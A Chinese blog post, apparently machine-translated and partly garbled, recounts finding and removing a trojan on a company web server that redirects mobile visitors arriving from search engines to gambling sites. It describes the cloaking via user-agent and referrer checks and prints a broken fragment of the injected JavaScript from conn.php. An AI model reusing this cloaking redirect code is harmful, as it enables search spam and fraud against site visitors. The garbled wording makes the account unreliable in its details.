网站被中木马并跳到了博彩网的调查和杀害过程
浏览:329 时间:2021-11-12

只要请求头后面的目录携带apk(无论是文件还是目录),访问站点就会判断请求头。如果是手机的请求头,会跳转到赌博网站。如果是pC浏览器,会播放空白页访问网站,让你看不到跳转的网站。如果域名后面的地址携带apk(无论是文件还是目录),就会判断请求头。如果是手机的请求头,会跳转到bc网站。如果是电脑浏览器,会播放空白页。最近客户订单越来越少,领导也赶时间。大部分的客户渠道来源都是从百度点击的只要冷静下来,看看网站上发生了什么。不看也没关系。这让我害怕。百度的网站收录增加了很多,本来以为是更新的文章造成的,但是仔细考虑之后,就没有那么多的收录了。在点击了十页之后,site:网站实际上找到了问题的关键。百度包含了很多我们网站没有的网址链接。复制我们域名的链接,提示不存在。从百度包含点进入并跳转到BC网站。

筛选过程

一开始判断js文件可能被修改过,但是经过长时间的浏览,使用了文件内容搜索等技巧,头皮发麻。翻了2个小时,没有发现js修改的痕迹,发现这个服务器的所有站点都有这个问题。看来事情并不简单。现在当务之急是尽快解决这个问题,否则影响太大。通过服务器的SINESAFE木马查杀工具,发现了很多隐藏属性无法删除的变形网壳和木马文件。两个上传的文件被本地扫描,火绒被报告有毒。

我意识到我的网站被黑了。快速打开服务器中的各个站点,将网站程序代码下载到本地,然后逐一检查各个代码,看看网站是否被黑客植入木马后门。果然,黑客插入的恶意代码在conn.php各个网站的根目录下被发现:

functiongo _ bots _ URL(){ vari nit _ flag=\' apk \',bct=document.referrer,bot=[\'baidu \',\' google \',\' yahoo \',\' bing \',\'搜搜\',\'搜狗\',\' 360.cn \',\' so.com \',\'有道\',\' anquan \',\' sm . cn \'];//,\' Hao sou \'];for(varinbot){ if(BCT . indexof(bot[I])!=-1){ init _ flag=\' apk \';

除去恶意代码后,百度搜索网站的点击量也正常显示。真不要脸。具有隐藏属性的文件在服务器中查看时,普通肉眼是看不到的。它需要一个特殊的SINESAFE木马查杀工具才能看到。难怪半天没找到问题的根源。下一步是修复网站漏洞,对服务器上的所有网站进行筛选和修复,防止它们再次被攻击和跳转。如果不熟悉程序代码,无法修复漏洞,可以去网站安全公司。